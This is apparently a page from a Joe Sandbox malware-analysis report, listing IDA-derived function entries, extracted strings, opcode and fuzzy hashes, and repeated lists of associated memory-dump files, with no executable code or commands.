Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: LF7Y$_^]\
API String ID: 237503144-3688711800
Opcode ID: 66dfdc676829ebdf8425801987218a0c6297520cd172e70dddd67fb303da5a85
Instruction ID: dc23b81cc8645dac0cd86a0e498f1645123ec2a5f5c3707cc15e358d8b8a420b
Opcode Fuzzy Hash: 66dfdc676829ebdf8425801987218a0c6297520cd172e70dddd67fb303da5a85
Instruction Fuzzy Hash: B822017590C351CFD3249F28E88072FBBE1BF96310F194A6CE995572A1D734A902EB92

Function 00F283D8 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 542COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00F284BD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00F285B4

Strings

LF7Y, xrefs: 00F28951
_^]\, xrefs: 00F28A15

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: LF7Y$_^]\
API String ID: 237503144-3688711800
Opcode ID: 1ce9c596d49b09cbbadef2ae87732db56cc9ba1ea9b3f2894c6e3a670a31112a
Instruction ID: 357a5c146ce7e99d48dc507f3f02f3cde349eb33cc5a3b7ff9e560f26244b467
Opcode Fuzzy Hash: 1ce9c596d49b09cbbadef2ae87732db56cc9ba1ea9b3f2894c6e3a670a31112a
Instruction Fuzzy Hash: 0E12017590C351CFD3209F28E88071BBBE1BF96310F194A6CE999572A1D738D942EB92

Function 00F3CDF0 Relevance: 6.9, Strings: 5, Instructions: 697COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00F3D006
f, xrefs: 00F3D081
_^]\, xrefs: 00F3CE29
fiP, xrefs: 00F3D2CF
jiP, xrefs: 00F3D301

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: InitializeThunk
String ID: _^]\$_^]\$f$fiP$jiP
API String ID: 2994545307-2734853458
Opcode ID: ca33bdcb4151754b21b6e0fc66ef124011cbcfc09509dd9e1d2e02188e6333a6
Instruction ID: ab289d43dfbb109069281ac76ad26df8c6fa5b31ac79b7d68a9a8bdf38b3cbde
Opcode Fuzzy Hash: ca33bdcb4151754b21b6e0fc66ef124011cbcfc09509dd9e1d2e02188e6333a6
Instruction Fuzzy Hash: C022F8B1A0C3419FD718CF28D89072FBBE2ABD9324F19892CE49597395D630DC51AB92

Function 00F26D2E Relevance: 6.7, Strings: 5, Instructions: 482COMMON

Download Yara Rule

Strings

PV, xrefs: 00F26DB3
\R, xrefs: 00F26DAC
_^]\_^]\, xrefs: 00F27064
X^, xrefs: 00F26DA5
uYD\, xrefs: 00F26E3D

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: _^]\_^]\$uYD\$PV$X^$\R
API String ID: 0-2314179683
Opcode ID: fd3036ab412c43d8c522c7af8200df85b64ed8119a9e10a6275101e80f1c21b0
Instruction ID: 1400b14f7edf792493811f1ce9572b93642493751df3c5084f2d46c9310619ea
Opcode Fuzzy Hash: fd3036ab412c43d8c522c7af8200df85b64ed8119a9e10a6275101e80f1c21b0
Instruction Fuzzy Hash: 88F1CCB6E04318CFDB14DFA8D8816AEBBB1FF49310F28446CDA42AB351D775A941DB90

Function 00F224E0 Relevance: 6.6, Strings: 5, Instructions: 304COMMON

Download Yara Rule

Strings

=K0E, xrefs: 00F22544
;GsA, xrefs: 00F22520
.[TU, xrefs: 00F22538
"_,Y, xrefs: 00F22530
pCj], xrefs: 00F22528

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
API String ID: 0-1171452581
Opcode ID: b55ed49fe9c2a07dd9271808cc7eb897693e25ee337eea42d3720c941cb8c93d
Instruction ID: 4a88190e964eff01399bdd4c07a0038b75c914525948c075503deee852b70b21
Opcode Fuzzy Hash: b55ed49fe9c2a07dd9271808cc7eb897693e25ee337eea42d3720c941cb8c93d
Instruction Fuzzy Hash: DB9135B1A08311ABC710DF24DC92B67B7F4EF95324F18852CF9898B291E774E905E752

Function 00F18169 Relevance: 6.5, Strings: 5, Instructions: 299COMMON

Download Yara Rule

Strings

7, xrefs: 00F18419
^`/4, xrefs: 00F181E1
gfff, xrefs: 00F18458
2h?n, xrefs: 00F183A0
SP, xrefs: 00F18396

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
